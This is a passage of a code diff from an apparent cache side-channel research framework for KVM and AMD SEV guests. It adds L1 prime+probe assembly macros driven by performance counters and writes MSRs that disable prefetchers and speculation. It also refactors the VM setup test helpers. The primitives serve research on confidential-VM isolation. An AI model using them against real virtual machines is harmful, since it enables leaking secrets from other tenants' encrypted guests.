-		if (count != 1 || evicted->cache_set != target) {
+		for (i = 0; i < L1_SETS; i++)
+			count += cachepc_msrmts[i];
+
+		if (count != 1 || cachepc_msrmts[target] != 1) {
 			CPC_ERR("Single eviction %i. test failed (%u vs %u)\n",
 				n, count, 1);
 			if (arg) *arg = count;
 			break;
 		}
-
-		cachepc_save_msrmts(head);
 	}
 
 	if (n == TEST_REPEAT_MAX) {
@@ -253,7 +234,7 @@ cachepc_kvm_single_eviction_test(void *p)
 		if (arg) *arg = count;
 	}
 
-	cachepc_release_victim(cachepc_ctx, ptr);
+	cachepc_release_victim(cachepc_ctx, victim);
 }
 
 void
@@ -263,17 +244,11 @@ cachepc_kvm_system_setup(void)
 	 * guessing work was involved, it is likely that one or more of
 	 * these operations are not needed */
 
-	// /* disable streaming store */
-	// cachepc_write_msr(0xc0011020, 0, 1ULL << 13);
-
-	// /* disable speculative data cache tlb reloads */
-	// cachepc_write_msr(0xc0011022, 0, 1ULL << 4);
-
-	// /* disable data cache hw prefetchers */
-	// cachepc_write_msr(0xc0011022, 0, 1ULL << 13);
-
-	/* disable inst cache hw prefetchers */
-	cachepc_write_msr(0xc0011021, 0, 1ULL << 13);
+	/* REF: BKDG Family 15h Model 00h-0Fh Rev 3.14 January 23, 2013 P.38 */
+	/* disable streaming store */
+	cachepc_write_msr(0xc0011020, 0, 1ULL << 28);
+	/* disable data cache hw prefetcher */
+	cachepc_write_msr(0xc0011022, 0, 1ULL << 13);
 
 	/* REF: https://arxiv.org/pdf/2204.03290.pdf */
 	/* l1 and l2 prefetchers */
@@ -283,17 +258,13 @@ cachepc_kvm_system_setup(void)
 	/* REF: https://community.amd.com/t5/archives-discussions/modifying-msr-to-disable-the-prefetcher/td-p/143443 */
 	cachepc_write_msr(0xc001102b, 0, 1ULL << 18);
 
-	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.168
-	 * disable L1 and L2 prefetcher */
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.168 */
+	/* disable L1 and L2 prefetcher */
 	cachepc_write_msr(0xC0000108, 0, 0b00101111);
 
-	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.111
-	 * disable speculation */
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.111 */
+	/* disable speculation */
 	cachepc_write_msr(0x00000048, 0, 0b10000111);
-
-	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.175
-	 * disable core performance boost */
-	cachepc_write_msr(0xC0010015, 0, 1ULL << 25);
 }
 
 int
@@ -301,10 +272,7 @@ cachepc_kvm_reset_ioctl(void __user *arg_user)
 {
 	int cpu;
 
-	if (arg_user) return -EINVAL;
-
 	cpu = get_cpu();
-
 	if (cpu != CPC_ISOLCPU) {
 		put_cpu();
 		return -EFAULT;
@@ -357,8 +325,8 @@ cachepc_kvm_test_eviction_ioctl(void __user *arg_user)
 	if (copy_from_user(&u32, arg_user, sizeof(u32)))
 		return -EFAULT;
 
-	ret = smp_call_function_single(2,
-		cachepc_kvm_single_eviction_test, &u32, true);
+	ret = smp_call_function_single(CPC_ISOLCPU,
+		cachepc_single_eviction_test, &u32, true);
 	WARN_ON(ret != 0);
 
 	if (copy_to_user(arg_user, &u32, sizeof(u32)))
@@ -452,19 +420,12 @@ cachepc_kvm_vmsa_read_ioctl(void __user *arg_user)
 int
 cachepc_kvm_svme_read_ioctl(void __user *arg_user)
 {
-	uint32_t lo, hi;
 	uint64_t res;
 	uint32_t svme;
 
 	if (!arg_user) return -EINVAL;
 
-	asm volatile (
-		"rdmsr"
-		: "=a" (lo), "=d" (hi)
-		: "c" (0xC0000080)
-	);
-	res = (((uint64_t) hi) << 32) | (uint64_t) lo;
-
+	res = __rdmsr(0xC0000080);
 	svme = (res >> 12) & 1;
 	if (copy_to_user(arg_user, &svme, sizeof(uint32_t)))
 		return -EFAULT;
@@ -701,20 +662,22 @@ cachepc_kvm_setup_test(void *p)
 
 	cpu = get_cpu();
 
-	CPC_WARN("Running on core %i\n", cpu);
+	CPC_INFO("Running on core %i\n", cpu);
 
 	if (cachepc_verify_topology())
 		goto exit;
 
-	cachepc_ctx = cachepc_get_ctx(L1_CACHE);
+	cachepc_ctx = cachepc_get_ctx();
 	cachepc_ds = cachepc_prepare_ds(cachepc_ctx);
 
+	cachepc_victim = cachepc_prepare_victim(cachepc_ctx, 13);
+
 	cachepc_kvm_system_setup();
 
 	spin_lock_irq(&lock);
-	cachepc_kvm_prime_probe_test();
-	cachepc_kvm_stream_hwpf_test();
-	cachepc_kvm_single_eviction_test(NULL);
+	cachepc_prime_probe_test();
+	cachepc_stream_hwpf_test();
+	cachepc_single_eviction_test(NULL);
 	spin_unlock_irq(&lock);
 
 exit:
@@ -730,6 +693,7 @@ cachepc_kvm_init(void)
 	cachepc_ds = NULL;
 
 	cachepc_debug = false;
+	cachepc_victim = NULL;
 
 	cachepc_retinst = 0;
 	cachepc_singlestep = false;
@@ -751,7 +715,8 @@ cachepc_kvm_init(void)
 
 	cachepc_events_reset();
 
-	ret = smp_call_function_single(2, cachepc_kvm_setup_test, NULL, true);
+	ret = smp_call_function_single(CPC_ISOLCPU,
+		cachepc_kvm_setup_test, NULL, true);
 	WARN_ON(ret != 0);
 }
 
@@ -759,6 +724,8 @@ void
 cachepc_kvm_exit(void)
 {
 	kfree(cachepc_msrmts);
+	kfree(cachepc_baseline);
+	kfree(cachepc_victim);
 
 	if (cachepc_ds)
 		cachepc_release_ds(cachepc_ctx, cachepc_ds);
diff --git a/cachepc/macro.S b/cachepc/macro.S
@@ -0,0 +1,66 @@
+#include "const.h"
+
+# clobbers rax, rbx, rcx, rdx
+.macro barrier
+    lfence # memory barrier
+    rdtsc # compiler barrier
+.endm
+
+# clobbers rax, rbx, rcx, rdx, (out)
+.macro readpmc event out
+    barrier
+
+    mov $0, %rax
+    mov $0, %rdx
+    mov $0xc0010201, %rbx
+    mov \event, %rcx
+    shl $1, %rcx
+    add %rbx, %rcx
+    mov $0, %rbx
+    rdmsr
+    shl $32, %rdx
+    or %rax, %rdx
+    mov %rdx, \out
+
+    barrier
+.endm
+
+# clobbers rax, rbx, rcx, rdx, cl_tmp, (cl_out)
+.macro prime name cl_in cl_tmp cl_out
+    barrier
+
+    mov \cl_in, \cl_tmp
+prime_loop_\name:
+    mov \cl_tmp, \cl_out
+    mov CPC_CL_NEXT_OFFSET(\cl_tmp), \cl_tmp
+    cmp \cl_tmp, \cl_in
+    jne prime_loop_\name
+
+    barrier
+.endm
+
+# clobbers rax, rbx, rcx, rdx, cl_tmp1, cl_tmp2, pmc_tmp, pmc_tmp2
+.macro probe name cl_in cl_tmp1 cl_tmp2 pmc_tmp1 pmc_tmp2
+    barrier
+
+    mov \cl_in, \cl_tmp1
+
+probe_loop_\name:
+    readpmc $CPC_L1MISS_PMC \pmc_tmp1
+
+.rept L1_ASSOC-1
+    mov CPC_CL_PREV_OFFSET(\cl_tmp1), \cl_tmp1
+.endr
+    mov CPC_CL_PREV_OFFSET(\cl_tmp1), \cl_tmp2
+
+    readpmc $CPC_L1MISS_PMC \pmc_tmp2
+
+    sub \pmc_tmp1, \pmc_tmp2
+    mov \pmc_tmp2, CPC_CL_COUNT_OFFSET(\cl_tmp1)
+
+    mov \cl_tmp2, \cl_tmp1
+    cmp \cl_in, \cl_tmp1
+    jne probe_loop_\name
+
+    barrier
+.endm
diff --git a/test/eviction.c b/test/eviction.c
@@ -1,3 +1,4 @@
+#include "test/util.h"
 #include "cachepc/uapi.h"
 
 #include <sys/ioctl.h>
@@ -14,7 +15,7 @@ main(int argc, const char **argv)
 {
 	uint8_t counts[L1_SETS];
 	uint32_t set;
-	int i, fd, ret;
+	int fd, ret;
 
 	fd = open("/dev/kvm", O_RDONLY);
 	if (fd < 0) err(1, "open");
@@ -30,16 +31,9 @@ main(int argc, const char **argv)
 	ret = ioctl(fd, KVM_CPC_READ_COUNTS, counts);
 	if (ret == -1) err(1, "ioctl KVM_CPC_READ_COUNTS");
 
-	for (i = 0; i < 64; i++) {
-		if (i % 16 == 0 && i)
-			printf("\n");
-		if (counts[i] > 0)
-			printf("\x1b[91m");
-		printf("%2i ", i);
-		if (counts[i] > 0)
-			printf("\x1b[0m");
-	}
+	print_counts(counts);
 	printf("\n");
+	print_counts_raw(counts);
 
 	close(fd);
 }
diff --git a/test/kvm-eviction.c b/test/kvm-eviction.c
@@ -139,6 +139,12 @@ main(int argc, const char **argv)
 		}
 	}
 
+	printf("=== Baseline ===\n\n", i);
+	print_counts(baseline);
+	printf("\n");
+	print_counts_raw(baseline);
+	printf("\n");
+
 	/* apply baseline and output samples */
 	for (i = 0; i < SAMPLE_COUNT; i++) {
 		for (k = 0; k < L1_SETS; k++) {
@@ -146,7 +152,7 @@ main(int argc, const char **argv)
 			counts[WITHOUT][i][k] -= baseline[k];
 		}
 
-		printf("\n=== Sample %2i ===\n", i);
+		printf("=== Sample %2i ===\n", i);
 
 		printf("\nWith eviction:\n\n");
 		print_counts(counts[WITH][i]);
@@ -157,6 +163,7 @@ main(int argc, const char **argv)
 		print_counts(counts[WITHOUT][i]);
 		printf("\n");
 		print_counts_raw(counts[WITHOUT][i]);
+		printf("\n");
 	}
 
 	/* check for measurment errors */
@@ -174,7 +181,7 @@ main(int argc, const char **argv)
 		if (!counts[WITH][i][TARGET_SET])
 			warnx("sample %i: Missing eviction in target set %i (=%i,%i)",
 				i, TARGET_SET, counts[WITH][i][TARGET_SET],
-				counts[WITH][i][TARGET_SET] + baseline[i]);
+				counts[WITH][i][TARGET_SET] + baseline[TARGET_SET]);
 	}
 
 	vm_deinit(&vms[WITH]);
diff --git a/test/kvm-eviction_guest.S b/test/kvm-eviction_guest.S
@@ -8,7 +8,7 @@
 .global guest_without_stop
 
 guest_with_start:
-	movq (L1_LINESIZE * (TARGET_SET + L1_SETS)), %rbx
+	mov (L1_LINESIZE * (TARGET_SET + L1_SETS)), %rbx
 	hlt
 	jmp guest_with_start
 guest_with_stop:
diff --git a/test/kvm.c b/test/kvm.c
@@ -203,27 +203,27 @@ snp_dbg_decrypt_rip(int vmfd)
 }
 
 void
-kvm_init(struct kvm *kvm, size_t ramsize,
+kvm_create_vm(struct kvm *kvm)
+{
+	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
+	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
+}
+
+void
+kvm_init_memory(struct kvm *kvm, size_t ramsize,
 	void *code_start, void *code_stop)
 {
 	struct kvm_userspace_memory_region region;
-	struct kvm_regs regs;
-	struct kvm_sregs sregs;
 	int ret;
 
-	/* Create a kvm instance */
-	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
-	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
-
-	/* Allocate guest memory */
 	kvm->memsize = ramsize;
 	kvm->mem = mmap(NULL, kvm->memsize, PROT_READ | PROT_WRITE,
 		MAP_SHARED | MAP_ANONYMOUS, -1, 0);
-	if (!kvm->mem) err(1, "Allocating guest memory");
+	if (!kvm->mem) err(1, "mmap kvm->mem");
+	memset(kvm->mem, 0, kvm->memsize);
 	assert(code_stop - code_start <= kvm->memsize);
 	memcpy(kvm->mem, code_start, code_stop - code_start);
 
-	/* Map it into the vm */
 	memset(&region, 0, sizeof(region));
 	region.slot = 0;
 	region.memory_size = kvm->memsize;
@@ -231,19 +231,32 @@ kvm_init(struct kvm *kvm, size_t ramsize,
 	region.userspace_addr = (uintptr_t) kvm->mem;
 	ret = ioctl(kvm->vmfd, KVM_SET_USER_MEMORY_REGION, &region);
 	if (ret == -1) err(1, "KVM_SET_USER_MEMORY_REGION");
+}
+
+void
+kvm_create_vcpu(struct kvm *kvm)
+{
+	int ret;
 
-	/* Create virtual cpu core */
 	kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
 	if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
 
-	/* Map the shared kvm_run structure and following data */
 	ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
 	if (ret == -1) err(1, "KVM_GET_VCPU_MMAP_SIZE");
 	if (ret < sizeof(struct kvm_run))
 		errx(1, "KVM_GET_VCPU_MMAP_SIZE too small");
-	kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE,
+	kvm->runsize = ret;
+	kvm->run = mmap(NULL, kvm->runsize, PROT_READ | PROT_WRITE,
 		MAP_SHARED, kvm->vcpufd, 0);
-	if (!kvm->run) err(1, "mmap vcpu");
+	if (!kvm->run) err(1, "mmap kvm->run");
+}
+
+void
+kvm_init_regs(struct kvm *kvm)
+{
+	struct kvm_regs regs;
+	struct kvm_sregs sregs;
+	int ret;
 
 	/* Initialize segment regs */
 	memset(&sregs, 0, sizeof(sregs));
@@ -265,72 +278,38 @@ kvm_init(struct kvm *kvm, size_t ramsize,
 }
 
 void
+kvm_init(struct kvm *kvm, size_t ramsize,
+	void *code_start, void *code_stop)
+{
+	kvm_create_vm(kvm);
+
+	kvm_init_memory(kvm, ramsize, code_start, code_stop);
+
+	kvm_create_vcpu(kvm);
+
+	kvm_init_regs(kvm);
+}
+
+void
 sev_kvm_init(struct kvm *kvm, size_t ramsize,
 	void *code_start, void *code_stop)
 {
-	struct kvm_userspace_memory_region region;
 	struct kvm_sev_launch_update_data update;
 	struct kvm_sev_launch_start start;
-	struct kvm_regs regs;
-	struct kvm_sregs sregs;
 	int ret, fwerr;
 
-	/* Create a kvm instance */
-	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
-	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
+	kvm_create_vm(kvm);
 
-	/* Allocate guest memory */
-	kvm->memsize = ramsize;
-	kvm->mem = mmap(NULL, kvm->memsize, PROT_READ | PROT_WRITE,
-		MAP_SHARED | MAP_ANONYMOUS, -1, 0);
-	if (!kvm->mem) err(1, "Allocating guest memory");
-	assert(code_stop - code_start <= kvm->memsize);
-	memcpy(kvm->mem, code_start, code_stop - code_start);
-
-	/* Map it into the vm */
-	memset(&region, 0, sizeof(region));
-	region.slot = 0;
-	region.memory_size = kvm->memsize;
-	region.guest_phys_addr = 0;
-	region.userspace_addr = (uintptr_t) kvm->mem;
-	ret = ioctl(kvm->vmfd, KVM_SET_USER_MEMORY_REGION, &region);
-	if (ret == -1) err(1, "KVM_SET_USER_MEMORY_REGION");
+	kvm_init_memory(kvm, ramsize, code_start, code_stop);
 
 	/* Enable SEV for vm */
 	ret = sev_ioctl(kvm->vmfd, KVM_SEV_INIT, NULL, &fwerr);
 	if (ret == -1) errx(1, "KVM_SEV_INIT: (%s) %s",
 		strerror(errno), sev_fwerr_str(fwerr));
 
-	/* Create virtual cpu core */
-	kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
-	if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
+	kvm_create_vcpu(kvm);
 
-	/* Map the shared kvm_run structure and following data */
-	ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
-	if (ret == -1) err(1, "KVM_GET_VCPU_MMAP_SIZE");
-	if (ret < sizeof(struct kvm_run))
-		errx(1, "KVM_GET_VCPU_MMAP_SIZE too small");
-	kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE,
-		MAP_SHARED, kvm->vcpufd, 0);
-	if (!kvm->run) err(1, "mmap vcpu");
-
-	/* Initialize segment regs */
-	memset(&sregs, 0, sizeof(sregs));
-	ret = ioctl(kvm->vcpufd, KVM_GET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_GET_SREGS");
-	sregs.cs.base = 0;
-	sregs.cs.selector = 0;
-	ret = ioctl(kvm->vcpufd, KVM_SET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_SET_SREGS");
-
-	/* Initialize rest of registers */
-	memset(&regs, 0, sizeof(regs));
-	regs.rip = 0;
-	regs.rsp = kvm->memsize - 8;
-	regs.rbp = kvm->memsize - 8;
-	regs.rflags = 0x2;
-	ret = ioctl(kvm->vcpufd, KVM_SET_REGS, &regs);
-	if (ret == -1) err(1, "KVM_SET_REGS");
+	kvm_init_regs(kvm);
 
 	/* Generate encryption keys and set policy */
 	memset(&start, 0, sizeof(start));
@@ -365,69 +344,22 @@ void
 sev_es_kvm_init(struct kvm *kvm, size_t ramsize,
 	void *code_start, void *code_stop)
 {
-	struct kvm_userspace_memory_region region;
 	struct kvm_sev_launch_update_data update;
 	struct kvm_sev_launch_start start;
-	struct kvm_regs regs;
-	struct kvm_sregs sregs;
 	int ret, fwerr;
 
-	/* Create a kvm instance */
-	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
-	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
-
-	/* Allocate guest memory */
-	kvm->memsize = ramsize;
-	kvm->mem = mmap(NULL, kvm->memsize, PROT_READ | PROT_WRITE,
-		MAP_SHARED | MAP_ANONYMOUS, -1, 0);
-	if (!kvm->mem) err(1, "Allocating guest memory");
-	assert(code_stop - code_start <= kvm->memsize);
-	memcpy(kvm->mem, code_start, code_stop - code_start);
+	kvm_create_vm(kvm);
 
-	/* Map it into the vm */
-	memset(&region, 0, sizeof(region));
-	region.slot = 0;
-	region.memory_size = kvm->memsize;
-	region.guest_phys_addr = 0;
-	region.userspace_addr = (uintptr_t) kvm->mem;
-	ret = ioctl(kvm->vmfd, KVM_SET_USER_MEMORY_REGION, &region);
-	if (ret == -1) err(1, "KVM_SET_USER_MEMORY_REGION");
+	kvm_init_memory(kvm, ramsize, code_start, code_stop);
 
 	/* Enable SEV for vm */
 	ret = sev_ioctl(kvm->vmfd, KVM_SEV_ES_INIT, NULL, &fwerr);
 	if (ret == -1) errx(1, "KVM_SEV_ES_INIT: (%s) %s",
 		strerror(errno), sev_fwerr_str(fwerr));
 
-	/* Create virtual cpu core */
-	kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
-	if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
-
-	/* Map the shared kvm_run structure and following data */
-	ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
-	if (ret == -1) err(1, "KVM_GET_VCPU_MMAP_SIZE");
-	if (ret < sizeof(struct kvm_run))
-		errx(1, "KVM_GET_VCPU_MMAP_SIZE too small");
-	kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE,
-		MAP_SHARED, kvm->vcpufd, 0);
-	if (!kvm->run) err(1, "mmap vcpu");
-
-	/* Initialize segment regs */
-	memset(&sregs, 0, sizeof(sregs));
-	ret = ioctl(kvm->vcpufd, KVM_GET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_GET_SREGS");
-	sregs.cs.base = 0;
-	sregs.cs.selector = 0;
-	ret = ioctl(kvm->vcpufd, KVM_SET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_SET_SREGS");
+	kvm_create_vcpu(kvm);
 
-	/* Initialize rest of registers */
-	memset(&regs, 0, sizeof(regs));
-	regs.rip = 0;
-	regs.rsp = kvm->memsize - 8;
-	regs.rbp = kvm->memsize - 8;
-	regs.rflags = 0x2;
-	ret = ioctl(kvm->vcpufd, KVM_SET_REGS, &regs);
-	if (ret == -1) err(1, "KVM_SET_REGS");
+	kvm_init_regs(kvm);
 
 	/* Generate encryption keys and set policy */
 	memset(&start, 0, sizeof(start));
@@ -470,33 +402,13 @@ sev_snp_kvm_init(struct kvm *kvm, size_t ramsize,
 	struct kvm_sev_snp_launch_update update;
 	struct kvm_sev_snp_launch_start start;
 	struct kvm_sev_snp_launch_finish finish;
-	struct kvm_snp_init init;
-	struct kvm_userspace_memory_region region;
 	struct kvm_enc_region enc_region;
-	struct kvm_sregs sregs;
-	struct kvm_regs regs;
+	struct kvm_snp_init init;
 	int ret, fwerr;
 
-	/* Create a kvm instance */
-	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
-	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
-
-	/* Allocate guest memory */
-	kvm->memsize = ramsize;
-	kvm->mem = mmap(NULL, kvm->memsize, PROT_READ | PROT_WRITE,
-		MAP_SHARED | MAP_ANONYMOUS, -1, 0);
-	if (!kvm->mem) err(1, "Allocating guest memory");
-	assert(code_stop - code_start <= kvm->memsize);
-	memcpy(kvm->mem, code_start, code_stop - code_start);
+	kvm_create_vm(kvm);
 
-	/* Map it into the vm */
-	memset(&region, 0, sizeof(region));
-	region.slot = 0;
-	region.memory_size = kvm->memsize;
-	region.guest_phys_addr = 0;
-	region.userspace_addr = (uintptr_t) kvm->mem;
-	ret = ioctl(kvm->vmfd, KVM_SET_USER_MEMORY_REGION, &region);
-	if (ret == -1) err(1, "KVM_SET_USER_MEMORY_REGION");
+	kvm_init_memory(kvm, ramsize, code_start, code_stop);
 
 	/* Enable SEV for vm */
 	memset(&init, 0, sizeof(init));
@@ -511,35 +423,9 @@ sev_snp_kvm_init(struct kvm *kvm, size_t ramsize,
 	ret = ioctl(kvm->vmfd, KVM_MEMORY_ENCRYPT_REG_REGION, &enc_region);
 	if (ret == -1) err(1, "KVM_MEMORY_ENCRYPT_REG_REGION");
 
-	/* Create virtual cpu */
-	kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
-	if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
+	kvm_create_vcpu(kvm);
 
-	/* Map the shared kvm_run structure and following data */
-	ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
-	if (ret == -1) err(1, "KVM_GET_VCPU_MMAP_SIZE");
-	if (ret < sizeof(struct kvm_run))
-		errx(1, "KVM_GET_VCPU_MMAP_SIZE too small");
-	kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE,
-		MAP_SHARED, kvm->vcpufd, 0);
-	if (!kvm->run) err(1, "mmap vcpu");
-
-	/* Initialize segment regs */
-	memset(&sregs, 0, sizeof(sregs));
-	ret = ioctl(kvm->vcpufd, KVM_GET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_GET_SREGS");
-	sregs.cs.base = 0;
-	sregs.cs.selector = 0;
-	ret = ioctl(kvm->vcpufd, KVM_SET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_SET_SREGS");
-
-	/* Initialize rest of registers */
-	memset(&regs, 0, sizeof(regs));
-	regs.rip = 0;
-	regs.rsp = kvm->memsize - 8 - L1_LINESIZE * L1_SETS;
-	regs.rbp = kvm->memsize - 8 - L1_LINESIZE * L1_SETS;
-	ret = ioctl(kvm->vcpufd, KVM_SET_REGS, &regs);
-	if (ret == -1) err(1, "KVM_SET_REGS");
+	kvm_init_regs(kvm);
 
 	/* Generate encryption keys and set policy */
 	memset(&start, 0, sizeof(start));
@@ -573,6 +459,7 @@ kvm_deinit(struct kvm *kvm)
 	close(kvm->vmfd);
 	close(kvm->vcpufd);
 	munmap(kvm->mem, kvm->memsize);
+	munmap(kvm->run, kvm->runsize);
 }
 
 void
diff --git a/test/kvm.h b/test/kvm.h
@@ -18,7 +18,7 @@ enum {
 struct kvm {
 	int fd, vmfd, vcpufd;
 	void *mem;
-	size_t memsize;
+	size_t memsize, runsize;
 	struct kvm_run *run;
 };

M	Makefile	\|	8	+++++---
M	README	\|	6	+++++-
M	cachepc/asm.S	\|	152	++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------------------
D	cachepc/asm.h	\|	66	------------------------------------------------------------------
M	cachepc/cachepc.c	\|	109	+++++++++++++++++++++++++++++++------------------------------------------------
M	cachepc/cachepc.h	\|	161	++++++-------------------------------------------------------------------------
M	cachepc/const.h	\|	5	++++-
M	cachepc/kvm.c	\|	157	+++++++++++++++++++++++++++++++------------------------------------------------
A	cachepc/macro.S	\|	66	++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
M	test/eviction.c	\|	14	++++----------
M	test/kvm-eviction.c	\|	11	+++++++++--
M	test/kvm-eviction_guest.S	\|	2	+-
M	test/kvm.c	\|	221	++++++++++++++++++++-----------------------------------------------------------
M	test/kvm.h	\|	2	+-